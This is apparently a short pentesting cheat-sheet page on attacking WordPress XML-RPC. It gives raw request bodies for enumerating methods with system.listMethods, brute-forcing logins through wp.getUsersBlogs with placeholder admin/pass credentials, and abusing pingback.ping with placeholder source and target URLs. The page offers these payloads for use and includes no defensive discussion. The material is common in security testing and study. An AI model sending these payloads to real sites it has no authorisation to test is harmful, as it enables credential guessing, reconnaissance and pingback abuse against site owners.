XMLRPC Attack

Method List

1
<methodCall>
2
<methodName>system.listMethods</methodName>
3
<params></params>
4
</methodCall>
Copied!

User Brute Force

1
<methodCall>
2
<methodName>wp.getUsersBlogs</methodName>
3
<params>
4
<param>
5
<value>admin</value>
6
</param>
7
<param>
8
<value>pass</value>
9
</param>
10
</params>
11
</methodCall>
Copied!

Pingback Vulnerability

1
<?xml version="1.0" encoding="iso-8859-1"?>
2
<methodCall>
3
<methodName>pingback.ping</methodName>
4
<params>
5
<param>
6
<value><string>http://source/url/here</string></value>
7
</param>
8
<param>
9
<value><string>http://target/url/here</string></value>
10
</param>
11
</params>
12
</methodCall>
Copied!

References

XML-RPC ile WAF Arkasındaki Sunucuların Gerçek IP'lerini Öğrenmek
Netsparker - Web Uygulaması Güvenlik Tarayıcısı
Last modified 2yr ago
Copy link
Contents
References